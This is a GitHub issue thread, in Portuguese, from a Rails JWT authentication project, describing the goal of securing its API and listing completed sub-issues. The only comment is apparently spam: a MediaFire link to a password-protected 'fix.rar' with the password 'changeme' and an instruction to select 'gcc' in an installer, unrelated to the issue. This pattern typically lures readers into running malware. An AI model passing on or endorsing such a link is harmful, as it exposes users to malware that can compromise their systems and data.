### ISSUE TITLE
History: Garantir a Autenticação da API

### ISSUE THREAD

**Issue by cassiosantana** [cassiosantana/rails_jwt_auth#10]
Descrição:

Para garantir a segurança e a integridade dos dados da aplicação, é necessário implementar autenticação na API. Isso significa que apenas os usuários autorizados devem ter acesso aos recursos.

Motivo:

A falta de autenticação na API abre portas para ataques mal-intencionados, como acesso não autorizado a dados sensíveis ou alteração de registros sem permissão. Além disso, a ausência de autenticação pode comprometer a confiabilidade da aplicação e afetar a experiência do usuário.

Objetivo:

Implementar autenticação na API para garantir que apenas os usuários autorizados tenham acesso aos recursos.

Features:

- [x] #2
- [x] #3
- [x] #4
- [x] #5
- [x] #6
- [x] #7
- [x] #8
- [x] #9

**Comment by littleblack666333** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."
